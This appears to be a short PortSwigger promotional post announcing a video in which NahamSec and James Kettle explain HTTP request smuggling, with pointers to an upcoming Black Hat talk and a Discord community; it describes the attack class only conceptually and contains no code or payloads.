HTTP Request Smuggling Explained: with seasoned bug bounty hunter NahamSec and world-class researcher James Kettle

Ever wondered how attackers can compromise modern websites by exploiting invisible cracks in HTTP infrastructure to win big bounties?

In his latest video, NahamSec walks through the basics of request smuggling with James Kettle, Director of Research at PortSwigger. Take a look as the pair dive deep into the world of HTTP Request Smuggling, a class of vulnerabilities that still haunts web stacks nearly two decades after it first surfaced.

What can I learn?

James breaks down how differences in the way front-end and back-end servers interpret HTTP headers can allow malicious requests to sneak past security defenses, hijack sessions, poison caches, and even compromise entire systems.

The video also covers cutting-edge techniques involving HTTP/2 downgrades, browser-powered desync, and real-world case studies impacting major platforms like Netflix and Atlassian.

Whether you’re a pentester, developer, or AppSec pro, this is a must-watch to understand one of the web’s most underestimated risks.

Watch the video.

Ready to learn even more about HTTP request smuggling?

On 6 August, James Kettle will be releasing groundbreaking new research uncovering new desync attacks at Black Hat USA, unveiling how HTTP/1.1 Must Die.

Keep up to date with this new release, learn how lucrative this can be for a bug hunter, and join the movement over at http1mustdie.com.

Can I chat with other bug hunters getting started with request smuggling?

Absolutely! There’s a thriving community of testers, bug hunters, students, and AppSec professionals on the PortSwigger Discord.

Join the server today to get involved in the request smuggling conversation, share your progress, and celebrate your wins!